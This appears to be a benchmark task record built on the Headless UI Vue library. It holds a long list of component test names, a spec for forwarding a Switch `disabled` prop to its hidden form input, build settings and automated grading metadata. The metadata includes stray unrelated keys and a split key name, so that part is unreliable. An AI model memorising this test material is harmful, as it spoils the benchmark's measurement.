skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be 
possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be 
possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when 
we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to 
explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not 
escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its 
children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire only one event for a given component change", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` 
prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a 
string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non 
disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible 
to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus 
the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using 
objects instead of primitives)", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `Tab` components", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of 
bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog 
component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the 
Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should be possible to submit a form by pressing enter", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in seconds)", "should transition out completely (render strategy = hidden)", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should fire events for all the stages", "should error when we are using a <Combobox.Button /> without a parent <Combobox />", "should error when we are using a <Combobox.Label /> without a parent <Combobox />", "should error when we are using a <Combobox.Options /> without a parent <Combobox />", "should error when we are using a <Combobox.Option /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render 
prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when value is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a Combobox.Label using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a Combobox.Label using a render prop and an `as` prop", "should be possible to render a Combobox.Button using a render prop", "should be possible to render a Combobox.Button using a render prop and an `as` prop", "should be possible to render a Combobox.Button and a Combobox.Label and see them linked together", "should be possible to render Combobox.Options using a render prop", "should be possible to always render the Combobox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Combobox.Options", "should be possible to render a Combobox.Option using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should be possible to wrap the Combobox.Options with a Transition component", "should be possible to open the combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with 
Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be possible to open the combobox with ArrowDown, and focus the selected option", "should be possible to open the combobox with ArrowUp and the last option should be active", "should not be possible to open the combobox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the combobox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the combobox options and jump to the first non-disabled one", "should be possible to close the combobox with Enter and choose the active combobox option", "pressing Tab should select the active item and move to the next DOM node", "pressing Shift+Tab should select the active item and move to the previous DOM node", "should bubble escape when using `static` on Combobox.Options", "should bubble escape when not using Combobox.Options at all", "should sync the input field correctly and reset it when pressing Escape", "should be possible to use ArrowDown to navigate the combobox options", "should be 
possible to use ArrowDown to navigate the combobox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the combobox options and jump to the first non-disabled one", "should be possible to go to the next item if no value is set", "should be possible to use ArrowUp to navigate the combobox options", "should be possible to use the End key to go to the last combobox option", "should be possible to use the End key to go to the last non disabled combobox option", "should be possible to use the End key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon End key press, when there are no non-disabled combobox options", "should be possible to use the PageDown key to go to the last combobox option", "should be possible to use the PageDown key to go to the last non disabled combobox option", "should be possible to use the PageDown key to go to the first combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageDown key press, when there are no non-disabled combobox options", "should be possible to use the Home key to go to the first combobox option", "should be possible to use the Home key to go to the first non disabled combobox option", "should be possible to use the Home key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon Home key press, when there are no non-disabled combobox options", "should be possible to use the PageUp key to go to the first combobox option", "should be possible to use the PageUp key to go to the first non disabled combobox option", "should be possible to use the PageUp key to go to the last combobox option if that is the only non-disabled combobox option", "should have no active combobox option upon PageUp key press, when there are no non-disabled combobox options", "should reset the value when the 
last character is removed, when in `nullable` mode", "should not be possible to search and activate a disabled option", "should maintain activeIndex and activeOption when filtering", "should focus the Combobox.Input when we click the Combobox.Label", "should not focus the Combobox.Input when we right click the Combobox.Label", "should be possible to open the combobox by focusing the input with immediate mode enabled", "should not be possible to open the combobox by focusing the input with immediate mode disabled", "should not be possible to open the combobox by focusing the input with immediate mode enabled when button is disabled", "should be possible to close a combobox on click with immediate mode enabled", "should be possible to close a focused combobox on click with immediate mode enabled", "should be possible to open the combobox on click", "should not be possible to open the combobox on right click", "should not be possible to open the combobox on click when the button is disabled", "should be possible to open the combobox on click, and focus the selected option", "should be possible to close a combobox on click", "should be a no-op when we click outside of a closed combobox", "should be possible to click outside of the combobox on another combobox button which should close the current combobox and open the new combobox", "should be possible to click outside of the combobox which should close the combobox (even if we press the combobox button)", "should be possible to click outside of the combobox, on an element which is within a focusable element, which closes the combobox", "should be possible to hover an option and make it active when using `static`", "should make a combobox option active when you move the mouse over it", "should be a no-op when we move the mouse and the combobox option is already active", "should be a no-op when we move the mouse and the combobox option is disabled", "should be possible to click a combobox option, which closes the 
combobox", "should be possible to click a combobox option, which closes the combobox with immediate mode enabled", "should be possible to click a disabled combobox option, which is a no-op", "should be possible focus a combobox option, so that it becomes active", "should not be possible to focus a combobox option which is disabled", "should be possible to hold the last active option", "should sync the input field correctly and reset it when resetting the value from outside (to null)", "should warn when changing the combobox from uncontrolled to controlled", "should warn when changing the combobox from controlled to uncontrolled", "should sync the input field correctly and reset it when resetting the value from outside (when using displayValue)", "should be possible to pass multiple values to the Combobox component", "should keep the combobox open when selecting an item via the keyboard", "should reset the active option, if the active option gets unmounted", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "should be possible to render a ComboboxLabel using a render prop", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` 
prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should be possible to use the PageDown key to go to the last non disabled Combobox option", "should focus the ComboboxButton when we click the ComboboxLabel", "should not focus the ComboboxInput when we right click the ComboboxLabel", "should sync the input field correctly and reset it when resetting the value from outside (to undefined)" ]
Function: Switch(props) Location: packages/@headlessui-vue/src/components/switch/switch.ts Inputs: - **disabled** (boolean, default false) – when true the component is non‑interactive and the hidden input that participates in form submission will receive a `disabled` attribute. - **name** (string, optional) – the name of the form field to be submitted. - **value** (string, optional) – the value associated with the field when the switch is checked. - **id** (string, optional) – unique element identifier. - **tabIndex** (number, default 0) – custom tab order for the control. - **modelValue** / **checked** (boolean) – current on/off state (handled via `v-model`). Outputs: - Renders a hidden `<input type="checkbox">` (or similar) with `hidden`, `readOnly`, `form`, `name`, `value`, and **disabled** attributes reflecting the props. When `disabled` is true the hidden input is disabled and therefore omitted from `FormData` on form submission. The visible switch element reflects the disabled state visually and prevents interaction. Description: The Switch component now accepts a `disabled` Boolean prop and propagates it to the internally generated hidden input used for form integration, ensuring disabled switches are not submitted as part of a form. Use this prop to make a switch read‑only and to prevent its value from being sent on form submit.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci --prefer-offline --no-audit --progress=false" ], "log_parser": "parse_log_js_4", "test_cmd": "npm test -- --verbose --no-colors" }
{ "num_modified_files": 12, "num_modified_lines": 30, "pr_author": "RobinMalfait", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to forward the `disabled` prop to the hidden `<input>` elements used for form submission, preventing disabled components from contributing data. The added tests verify that when a component is disabled, only the explicit hidden field is submitted, matching the intended behavior. There are no mismatches between the tests and the specification, and no signals of B‑category problems (no external docs, no implicit naming, no ambiguous requirements). The task is well‑defined and can be solved by propagating the `disabled` flag to the hidden fields across the relevant components, which is a straightforward code change.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, 
"test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }